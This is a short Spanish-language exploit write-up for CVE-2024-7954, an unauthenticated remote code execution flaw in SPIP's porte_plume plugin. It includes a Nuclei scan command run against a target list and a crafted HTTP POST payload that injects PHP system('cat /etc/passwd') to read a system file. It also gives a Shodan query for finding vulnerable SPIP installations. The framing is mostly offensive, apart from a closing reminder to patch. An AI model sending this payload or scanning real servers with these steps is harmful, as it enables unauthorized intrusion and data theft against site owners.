
Exploit para CVE-2024-7954, una RCE crítica en el plugin porte_plume de SPIP, con una solicitud HTTP manipulada y plantilla Nuclei para escaneo automatizado.
El plugin porte_plume, utilizado por versiones de SPIP anteriores a 4.30-alpha2, 4.2.13 y 4.1.16, es susceptible a una vulnerabilidad crítica de ejecución arbitraria de código (RCE). Este fallo permite a un atacante remoto no autenticado ejecutar código PHP arbitrario como el usuario de SPIP mediante la creación de una solicitud HTTP específica. El potencial de explotación es grave, permitiendo a los atacantes ejecutar comandos maliciosos en el servidor, lo que podría provocar acceso no autorizado, violaciones de datos o un mayor compromiso del sistema.
##Nuclei Scan
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
Un ejemplo de una solicitud HTTP manipulada que puede utilizarse para explotar esta vulnerabilidad es el siguiente:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST está dirigida a la acción porte_plume_previsu del archivo index.php de SPIP.system() de PHP para ejecutar un comando (en este caso, cat /etc/passwd), que lee el contenido del archivo de contraseñas.system(), un atacante podría ejecutar cualquier código PHP en el servidor, lo que tendría consecuencias graves.Para identificar instalaciones de SPIP potencialmente vulnerables, se puede utilizar la siguiente consulta de búsqueda de Shodan:
app="SPIP"
Esta vulnerabilidad subraya la importancia de mantener el software actualizado e implementar medidas de seguridad robustas para protegerse contra la explotación.